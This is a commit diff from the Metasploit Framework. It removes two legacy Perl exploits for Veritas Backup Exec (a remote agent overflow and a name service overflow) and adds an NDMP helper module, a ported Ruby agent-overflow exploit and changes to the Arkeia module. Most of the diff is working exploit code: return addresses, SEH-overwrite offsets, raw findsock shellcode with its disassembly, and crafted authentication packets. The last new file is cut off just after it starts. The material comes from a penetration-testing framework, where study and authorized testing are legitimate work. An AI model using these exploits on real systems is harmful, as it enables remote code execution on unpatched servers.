Bug fixes for alphanum vs alphanumeric
Added some target print code to the brightstor explotis Added the backupexec epxloits git-svn-id: file:///home/svn/incoming/trunk@3132 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
af19802cc0
commit
7624b4d78a
|
@ -1,272 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Veritas
|
||||
BackupExec Windows Agent software. This vulnerability occurs
|
||||
when a client authentication request is received with type
|
||||
'3' and a long password argument. Reliable execution is
|
||||
obtained by abusing the stack overflow to smash a SEH
|
||||
pointer.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2005-0773'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
|
||||
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
|
||||
[ 'MIL', '9'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, winnt, win2000, winxp, win2003',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::backupexec_agent;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 10000],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'Keys' => ['+ws2ord'],
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a stack overflow in the Veritas BackupExec Windows
|
||||
Agent software. This vulnerability occurs when a client authentication request
|
||||
is received with type '3' and a long password argument. Reliable execution is
|
||||
obtained by abusing the stack overflow to smash a SEH pointer.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['CVE', '2005-0773' ],
|
||||
['URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
|
||||
['URL', 'http://seer.support.veritas.com/docs/276604.htm' ],
|
||||
['MIL', '9'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' =>
|
||||
[
|
||||
['Veritas BE 9.0/9.1/10.0 (All Windows)', 0x0140f8d5, 0x014261b0 ],
|
||||
['Veritas BE 9.0/9.1/10.0 (Windows 2000)', 0x75022ac4, 0x75022ac4 ],
|
||||
],
|
||||
|
||||
'Keys' => ['veritas'],
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
# Version 4.2 -> 9.1
|
||||
# Version 5.1 -> 10.0
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my ($vend, $prod, $vers) = $self->GetVersion;
|
||||
|
||||
if (! $vend) {
|
||||
$self->PrintLine("[*] Could not determine the version number");
|
||||
return $self->CheckCode('Unknown');
|
||||
}
|
||||
|
||||
$self->PrintLine("[*] $prod Version $vers ($vend)");
|
||||
return $self->CheckCode('Detected');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
|
||||
|
||||
my $s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
|
||||
if ( $s->IsError ) {
|
||||
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
||||
return;
|
||||
}
|
||||
|
||||
my $res = $s->Recv(4, 5);
|
||||
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
|
||||
|
||||
my $username = "X" x 512;
|
||||
my $password = Pex::Text::PatternCreate(8192);
|
||||
|
||||
# Place our payload early in the request and jump backwards into it
|
||||
substr($password, 3536-length($shellcode), length($shellcode), $shellcode);
|
||||
|
||||
# This offset is required for version 10.0
|
||||
substr($password, 3536, 2, "\xeb\x06");
|
||||
substr($password, 3540, 4, pack('V', $target->[2]) );
|
||||
substr($password, 3544, 5, "\xe9" . pack('V', -1037));
|
||||
|
||||
# This offset is required for version 9.0/9.1
|
||||
substr($password, 4524, 2, "\xeb\x06");
|
||||
substr($password, 4528, 4, pack('V', $target->[1]) );
|
||||
substr($password, 4532, 5, "\xe9" . pack('V', -2025));
|
||||
|
||||
my $conn_auth =
|
||||
pack('N', 1). # Sequence number
|
||||
pack('N', time()). # Current time
|
||||
pack('N', 0). # Message type (request)
|
||||
pack('N', 0x901). # Message name (connect_client_auth)
|
||||
pack('N', 0). # Reply sequence number
|
||||
pack('N', 0). # Error status
|
||||
pack('N', 3). # Authentication type
|
||||
pack('N', length($username)).
|
||||
$username.
|
||||
pack('N', length($password)).
|
||||
$password.
|
||||
pack('N', 4);
|
||||
|
||||
$self->PrintLine( "[*] Sending authentication request of " . length($conn_auth) . " bytes..." );
|
||||
$s->Send(pack('N', 0x80000000 + length($conn_auth)) . $conn_auth);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
sub GetVersion {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
|
||||
if ( $s->IsError ) {
|
||||
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
||||
return undef;
|
||||
}
|
||||
|
||||
my $res = $s->Recv(4, 5);
|
||||
return undef if ! $res;
|
||||
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
|
||||
|
||||
my $serv_info =
|
||||
pack('N', 1). # Sequence number
|
||||
pack('N', time()). # Current time
|
||||
pack('N', 0). # Message type (request)
|
||||
pack('N', 0x108). # Message name (connect_client_auth)
|
||||
pack('N', 0). # Reply sequence number
|
||||
pack('N', 0); # Error status
|
||||
|
||||
$s->Send(pack('N', 0x80000000 + length($serv_info)) . $serv_info);
|
||||
$res = $s->Recv(4, 5);
|
||||
return undef if ! $res;
|
||||
|
||||
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
|
||||
$s->Close;
|
||||
|
||||
# Skip past the protocols headers
|
||||
$res = substr($res, 28);
|
||||
|
||||
# Vendor
|
||||
my $vend_len = unpack('N', substr($res, 0, 4));
|
||||
my $vend = substr($res, 4, $vend_len);
|
||||
$res = substr($res, 4 + $vend_len + 1);
|
||||
|
||||
# Product
|
||||
my $prod_len = unpack('N', substr($res, 0, 4));
|
||||
my $prod = substr($res, 4, $prod_len);
|
||||
$res = substr($res, 4 + $prod_len + 1);
|
||||
|
||||
# Version
|
||||
my $vers_len = unpack('N', substr($res, 0, 4));
|
||||
my $vers = substr($res, 4, $vers_len);
|
||||
$res = substr($res, 4 + $vers_len + 1);
|
||||
|
||||
return ($vend, $prod, $vers);
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -1,243 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Name Service Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Veritas Backup
|
||||
Exec Agent Browser service. This vulnerability occurs when a
|
||||
recv() call has a length value too long for the destination
|
||||
stack buffer. By sending an agent name value of 63 bytes or
|
||||
more, we can overwrite the return address of the recv
|
||||
function. Since we only have ~60 bytes of contiguous space
|
||||
for shellcode, a tiny findsock payload is sent which uses a
|
||||
hardcoded IAT address for the recv() function. This payload
|
||||
will then roll the stack back to the beginning of the page,
|
||||
recv() the real shellcode into it, and jump to it. This
|
||||
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
|
||||
8.6.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '12418'],
|
||||
[ 'CVE', '2004-1172'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
|
||||
[ 'MIL', '10'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "",
|
||||
'MinNops' => 512,
|
||||
'MinNops' => 512,
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, win2000, winxp, win2003',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 16 2004',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::backupexec_ns;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Veritas Backup Exec Name Service Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 6101],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'MinNops' => 512,
|
||||
'MaxNops' => 512,
|
||||
'Space' => 1024,
|
||||
'BadChars' => '',
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
'Keys' => ['+ws2ord'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a vulnerability in the Veritas Backup Exec
|
||||
Agent Browser service. This vulnerability occurs when a recv() call
|
||||
has a length value too long for the destination stack buffer. By
|
||||
sending an agent name value of 63 bytes or more, we can overwrite
|
||||
the return address of the recv function. Since we only have ~60
|
||||
bytes of contiguous space for shellcode, a tiny findsock payload
|
||||
is sent which uses a hardcoded IAT address for the recv() function.
|
||||
This payload will then roll the stack back to the beginning of
|
||||
the page, recv() the real shellcode into it, and jump to it.
|
||||
This module has been tested against Veritas 9.1 SP0, 9.1 SP1,
|
||||
and 8.6.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '12418'],
|
||||
['CVE', '2004-1172'],
|
||||
['URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
|
||||
['MIL', '10'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[ # BackupExec 9.1 SP0/SP1 return contributed by class101
|
||||
['Veritas BE 9.1 SP0/SP1', 0x0142ffa1, 0x401150FF], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
|
||||
['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
|
||||
],
|
||||
|
||||
'Keys' => ['veritas'],
|
||||
|
||||
'DisclosureDate' => 'Dec 16 2004',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
|
||||
|
||||
my $s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
|
||||
if ( $s->IsError ) {
|
||||
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
||||
return;
|
||||
}
|
||||
|
||||
my $code = "\xfc" x 112;
|
||||
|
||||
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
|
||||
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
|
||||
# nulls: [0x00401150 -> 0x401150FF]
|
||||
my $read =
|
||||
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74".
|
||||
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11".
|
||||
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75".
|
||||
"\xe1\xff\xd7";
|
||||
|
||||
# Configure the IAT for the recv call
|
||||
substr($read, 29, 4, pack('V', $target->[2]));
|
||||
|
||||
# Stuff it all into the request...
|
||||
substr( $code, 2, length($read), $read );
|
||||
|
||||
# Return address to use (jmp esi)
|
||||
substr( $code, 66, 4, pack('V', $target->[1]) );
|
||||
|
||||
# The registration request
|
||||
my $req =
|
||||
"\x02\x00\x32\x00\x20\x00" . $code . "\x00".
|
||||
"1.1.1.1.1.1\x00".
|
||||
"\xeb\x81";
|
||||
|
||||
$self->PrintLine( "[*] Sending agent registration request of " . length($req) . " bytes..." );
|
||||
$s->Send($req);
|
||||
|
||||
$self->PrintLine( "[*] Sending final payload of " . length($req) . " bytes..." );
|
||||
$s->Send($shellcode);
|
||||
|
||||
sleep(2);
|
||||
$self->PrintLine("[*] Waiting for a response...");
|
||||
return;
|
||||
}
|
||||
|
||||
my $findsock = q{
|
||||
00000000 31F6 xor esi,esi
|
||||
00000002 C1EC0C shr esp,0xc
|
||||
00000005 C1E40C shl esp,0xc
|
||||
00000008 89E7 mov edi,esp
|
||||
0000000A 89FB mov ebx,edi
|
||||
0000000C 6A01 push byte +0x1
|
||||
0000000E 8B7424FE mov esi,[esp-0x2]
|
||||
00000012 31D2 xor edx,edx
|
||||
00000014 52 push edx
|
||||
00000015 42 inc edx
|
||||
00000016 C1E210 shl edx,0x10
|
||||
00000019 52 push edx
|
||||
0000001A 57 push edi
|
||||
0000001B 56 push esi
|
||||
0000001C B8FF501140 mov eax,0x401150ff
|
||||
00000021 C1E808 shr eax,0x8
|
||||
00000024 FF10 call near [eax]
|
||||
00000026 85C0 test eax,eax
|
||||
00000028 7907 jns 0x31
|
||||
0000002A 89DC mov esp,ebx
|
||||
0000002C 4E dec esi
|
||||
0000002D 85F6 test esi,esi
|
||||
0000002F 75E1 jnz 0x12
|
||||
00000031 FFD7 call edi
|
||||
};
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -213,7 +213,8 @@ class Exploit < Msf::Module
|
|||
require 'msf/core/exploit/dcerpc'
|
||||
require 'msf/core/exploit/mssql'
|
||||
require 'msf/core/exploit/arkeia'
|
||||
|
||||
require 'msf/core/exploit/ndmp'
|
||||
|
||||
#
|
||||
# Creates an instance of the exploit module. Mad skillz.
|
||||
#
|
||||
|
|
|
@ -28,6 +28,14 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
|
||||
#
|
||||
# Flush the receive buffer on a new connection
|
||||
#
|
||||
def connect
|
||||
super
|
||||
self.recv_buff = ''
|
||||
end
|
||||
|
||||
#
|
||||
# This method dumps some information about the service
|
||||
#
|
||||
|
@ -38,7 +46,8 @@ module Exploit::Remote::Arkeia
|
|||
resp = ''
|
||||
|
||||
# Authenticate1
|
||||
req = "\x00\x41\x00\x00\x00\x00\x00\x73"+
|
||||
req =
|
||||
"\x00\x41\x00\x00\x00\x00\x00\x73"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x7f\x00\x00\x01"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
|
@ -63,7 +72,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Authenticate2
|
||||
req = "\x00\x73\x00\x00\x00\x00\x00\x0c" +
|
||||
req =
|
||||
"\x00\x73\x00\x00\x00\x00\x00\x0c" +
|
||||
"\x32\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\x00\x00\x00"
|
||||
|
||||
|
@ -75,7 +85,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# SessionSetup1
|
||||
req = "\x00\x61\x00\x04\x00\x01\x00\x15"+
|
||||
req =
|
||||
"\x00\x61\x00\x04\x00\x01\x00\x15"+
|
||||
"\x00\x00\x31\x35\x33\x39\x38\x00"+
|
||||
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00"
|
||||
|
@ -88,7 +99,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Begin the ARKADMIN_GET_CLIENT_INFO request
|
||||
req = "\x00\x62\x00\x01\x00\x02\x00\x25"+
|
||||
req =
|
||||
"\x00\x62\x00\x01\x00\x02\x00\x25"+
|
||||
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
|
||||
"\x5f\x47\x45\x54\x5f\x43\x4c\x49"+
|
||||
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
|
||||
|
@ -103,7 +115,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Complete the ARKADMIN_GET_CLIENT_INFO request
|
||||
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
req =
|
||||
"\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
"\x30\x00\x31\x00\x32\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00"
|
||||
|
@ -129,7 +142,8 @@ module Exploit::Remote::Arkeia
|
|||
info['Hostname'] = mver[1] if mver
|
||||
|
||||
# Begin the ARKADMIN_GET_MACHINE_INFO request
|
||||
req = "\x00\x62\x00\x01\x00\x02\x00\x26"+
|
||||
req =
|
||||
"\x00\x62\x00\x01\x00\x02\x00\x26"+
|
||||
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
|
||||
"\x5f\x47\x45\x54\x5f\x4d\x41\x43"+
|
||||
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
|
||||
|
@ -148,7 +162,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Complete the ARKADMIN_GET_MACHINE_INFO request
|
||||
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
req =
|
||||
"\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
"\x30\x00\x31\x00\x33\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00"
|
||||
|
|
|
@ -0,0 +1,118 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This module exposes methods for accessing NDMP services
|
||||
#
|
||||
###
|
||||
module Exploit::Remote::NDMP
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
#
|
||||
# Creates an instance of a MSSQL exploit module.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
# Register the options that all FTP exploits may make use of.
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(10000),
|
||||
], Msf::Exploit::Remote::NDMP)
|
||||
|
||||
self.recv_buff = ''
|
||||
end
|
||||
|
||||
#
|
||||
# Flush the receive buffer on a new connection
|
||||
#
|
||||
def connect
|
||||
super
|
||||
self.recv_buff = ''
|
||||
end
|
||||
|
||||
#
|
||||
# This method dumps ndmp version information
|
||||
#
|
||||
def ndmp_info
|
||||
connect
|
||||
req = [
|
||||
1, # Sequence number
|
||||
Time.now.to_i, # Current time
|
||||
0, # Message type (request)
|
||||
0x108, # Message name (version)
|
||||
0, # Reply sequence number
|
||||
0, # Error status
|
||||
].pack('NNNNNN')
|
||||
|
||||
resp = ndmp_recv()
|
||||
ndmp_send(req)
|
||||
resp = ndmp_recv()
|
||||
disconnect
|
||||
|
||||
if (not (resp and resp.length > 28))
|
||||
return false
|
||||
end
|
||||
|
||||
info = { }
|
||||
|
||||
i = 32
|
||||
|
||||
vend_len = resp[i, 4].unpack('N')[0]
|
||||
vend = resp[i + 4, vend_len]
|
||||
i += vend_len + 4 + 1
|
||||
|
||||
prod_len = resp[i, 4].unpack('N')[0]
|
||||
prod = resp[i + 4, prod_len]
|
||||
i += prod_len + 4 + 1
|
||||
|
||||
vers_len = resp[i, 4].unpack('N')[0]
|
||||
vers = resp[i + 4, vers_len]
|
||||
i += vers_len + 4 + 1
|
||||
|
||||
info['Version'] = vers
|
||||
info['Product'] = prod
|
||||
info['Vendor'] = vend
|
||||
|
||||
return info
|
||||
end
|
||||
|
||||
#
|
||||
# This method reads from the socket and parses out a single
|
||||
# NDMP response, buffering the rest
|
||||
#
|
||||
def ndmp_recv(nsock = self.sock)
|
||||
if (self.recv_buff.length < 4)
|
||||
self.recv_buff << (sock.get_once || '')
|
||||
end
|
||||
|
||||
if (self.recv_buff.length < 4)
|
||||
return false
|
||||
end
|
||||
|
||||
# Read the length header out of the message
|
||||
dlen = self.recv_buff[0, 4].unpack('N')[0] & 0x7fffffff
|
||||
|
||||
# Do we have the entire response message?
|
||||
if (self.recv_buff.length >= dlen + 4)
|
||||
return self.recv_buff.slice!(0, dlen + 4)
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
#
|
||||
# This method tacks a length header on a packet then sends
|
||||
# it out the socket
|
||||
#
|
||||
def ndmp_send(data, nsock = self.sock)
|
||||
nsock.put( [ data.length + 0x80000000 ].pack('N') + data )
|
||||
end
|
||||
|
||||
attr_accessor :recv_buff
|
||||
end
|
||||
end
|
|
@ -81,6 +81,9 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
||||
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
|
||||
head[6, 2] = [data.length].pack('n')
|
||||
|
|
|
@ -0,0 +1,126 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::NDMP
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Veritas
|
||||
BackupExec Windows Agent software. This vulnerability occurs
|
||||
when a client authentication request is received with type
|
||||
'3' and a long password argument. Reliable execution is
|
||||
obtained by abusing the stack overflow to smash a SEH
|
||||
pointer.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2005-0773'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
|
||||
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
|
||||
[ 'MIL', '9'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Veritas BE 9.0/9.1/10.0 (All Windows)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x0140f8d5, 0x014261b0 ],
|
||||
},
|
||||
],
|
||||
[
|
||||
'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x75022ac4, 0x75022ac4 ],
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(10000)
|
||||
], self)
|
||||
end
|
||||
|
||||
def check
|
||||
info = ndmp_info()
|
||||
if (info and info['Version'])
|
||||
print_status(" Vendor: #{info['Vendor']}")
|
||||
print_status("Product: #{info['Product']}")
|
||||
print_status("Version: #{info['Version']}")
|
||||
|
||||
if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
resp = ndmp_recv()
|
||||
|
||||
username = 'X' * 512
|
||||
password = Rex::Text.rand_text_alphanumeric(8192)
|
||||
|
||||
# Place our payload early in the request and jump backwards into it
|
||||
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
# This offset is required for version 10.0
|
||||
password[3536, 2] = "\xeb\x06"
|
||||
password[3540, 4] = [ target['Rets'][1] ].pack('V')
|
||||
password[3544, 5] = "\xe9" + [-1037].pack('V')
|
||||
|
||||
# This offset is required for version 9.0/9.1
|
||||
password[4524, 2] = "\xeb\x06"
|
||||
password[4528, 4] = [ target['Rets'][0] ].pack('V')
|
||||
password[4532, 5] = "\xe9" + [-2025].pack('V')
|
||||
|
||||
# Create the authentication request
|
||||
auth = [
|
||||
1, # Sequence number
|
||||
Time.now.to_i, # Current time
|
||||
0, # Message type (request)
|
||||
0x901, # Message name (connect_client_auth)
|
||||
0, # Reply sequence number
|
||||
0, # Error status
|
||||
3 # Authentication type
|
||||
].pack('NNNNNNN') +
|
||||
[ username.length ].pack('N') + username +
|
||||
[ password.length ].pack('N') + password +
|
||||
[ 4 ].pack('N')
|
||||
|
||||
print_status("Sending authentication request...")
|
||||
ndmp_send(auth)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,137 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
